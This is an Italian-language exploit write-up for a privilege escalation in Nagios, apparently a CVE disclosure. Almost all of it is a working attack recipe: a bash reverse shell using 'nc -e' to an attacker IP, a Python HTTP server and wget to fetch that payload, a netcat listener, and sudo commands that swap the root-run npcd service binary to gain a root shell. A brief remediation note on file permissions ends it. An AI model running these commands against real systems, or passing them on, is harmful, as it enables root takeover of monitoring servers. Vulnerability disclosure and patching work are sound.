
Escalation dei privilegi in Nagios 2024R1.01
CVE Scoperto da: Jarod Jaslow (MAWK)
Come utente "NAGIOS", creare un file sulla macchina attaccante con il seguente contenuto:
#!/bin/bash
nc -e /bin/bash <Attacker IP> 4445

Ospitare il file sulla macchina attaccante tramite un server HTTP Python:
python3 -m http.server 8000

Avviare un server di ascolto Netcat (NC) sulla macchina attaccante:
nc -nlvp 4445

Recuperare il file dalla macchina attaccante:
wget http://<Attacker IP>:8000/npcd

Eseguire i seguenti comandi per escalare i privilegi e ricevere una connessione come root:
sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
cp npcd /usr/local/nagios/bin/npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd


Si raccomanda di limitare la capacità dell'utente "NAGIOS" di scrivere negli eseguibili dei servizi Nagios che vengono eseguiti come root. Ciò può essere ottenuto implementando permessi dei file e controlli di accesso più restrittivi per le directory e i file pertinenti associati ai servizi Nagios.
Questo dovrebbe essere risolto nelle nuove versioni
CVE: